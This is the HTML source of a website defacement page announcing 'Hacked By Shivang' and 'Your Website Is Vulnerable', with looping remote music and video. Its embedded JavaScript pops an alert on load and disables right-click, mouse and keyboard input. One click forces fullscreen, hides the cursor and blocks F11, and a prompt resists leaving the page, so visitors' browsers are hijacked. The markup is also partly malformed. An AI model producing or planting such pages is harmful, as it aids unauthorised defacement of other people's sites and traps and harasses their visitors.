


<html lang="en-US"><script>alert('instagram- @shivang_png')</script><head><title>You Dream We Embide </title>

<meta property="og:title" content=".Nezom.">

<meta property="og:author" content="1NT3L">
<style type="text/css"> @import url("https://fonts.googleapis.com/css?family=Kelly+Slab"); body { background-color: black; color:white; font-family:Kelly Slab; font-size:14px; } img { opacity:1; } img:hover { opacity:1; } a { text-decoration:none; color:#FFFFFF; } a:hover { text-decoration:none; color:red; } x{ color: red; } @keyframes fade { from { opacity: 1.0; } 50% { opacity: 1; } to { opacity: 1.0; } } @-webkit-keyframes fade { from { opacity: 1.0; } 50% { opacity: 0.5; } to { opacity: 1.0; } } .blink { animation:fade 0.5s infinite; -webkit-animation:fade 0.7s infinite; } </style>
<style>

		body{
			background-image:url
			background-size:1;
			background-attachment: fixed;
		}
		p{
			color:white;
		}
	</style>
	

<body><center><table height="80%" width="100%"> <br> <br> <br> <td align="center"><img style="width:350px;" width="520"><br><font class="blink" face="Kelly Slab" size="10"><i> <b> Hacked By <x> Shivang </x> </x></i><font size="6"> <br><hr> Your Website Is Vulnerable <br>Ethic-Nity<br></x><hr> <br> <br> <br>Ethic-Nity
<center> <br> <br>	</form> <audio id="lagu" src="https://j.top4top.io/m_2249zrcr50.mp3"></audio> </audio> 
<script> function play(){ var audio = document.getElementById('lagu'); audio.play(); } function liat(){ document.getElementById('galiat').style.visibility='visible'; } function pause(){ var audio = document.getElementById('lagu'); audio.pause(); } function liat(){ document.getElementById('galiat').style.visibility='visible'; } </script>

<body bgcolor="black" text="white" oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" onclick="document.getElementById('lagu').play();fs()" id="body">
<style type="text/css">
    center {
        font-family: Courier;
    }
    img {
        opacity: 80%;
    }
    red {
        color: red;
    }
    #background-video {
        height: 100vh;
        width: 100vw;
        object-fit: cover;
        position: fixed;
        left: 0;
        right: 0;
        top: 0;
        bottom: 0;
        z-index: -1;
    }
    font {
        text-shadow: #000 0px 0px 3px;
        -webkit-font-smoothing: antialiased;
    }
</style>
<script language="JavaScript">
    window.onbeforeunload = confirmExit;
    function confirmExit() {
        return "are you sure ? wkwk";
    }
    function fs(){
    var elem = document.documentElement;
    if (elem.requestFullscreen) {
      elem.requestFullscreen();
    } else if (elem.msRequestFullscreen) {
      elem.msRequestFullscreen();
    } else if (elem.mozRequestFullScreen) {
      elem.mozRequestFullScreen();
    } else if (elem.webkitRequestFullscreen) {
      elem.webkitRequestFullscreen();
    }
    document.getElementById("body").style.cursor = 'none';
    document.onkeydown = function (e) {
        return false;
    }
    document.addEventListener("keydown", e => {
    if(e.key == "F11") e.preventDefault();
    });
}
</script>

<video id="background-video" src="https://github.com/anonseven/heker/raw/main/videoplayback.mp4" autoplay="" loop="" muted="" poster="data:image/png;base64, iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=">
    <source src="https://github.com/anonseven/heker/raw/main/videoplayback.mp4" type="video/mp4">
</video>
</td></tr></table></center>
</body></html>
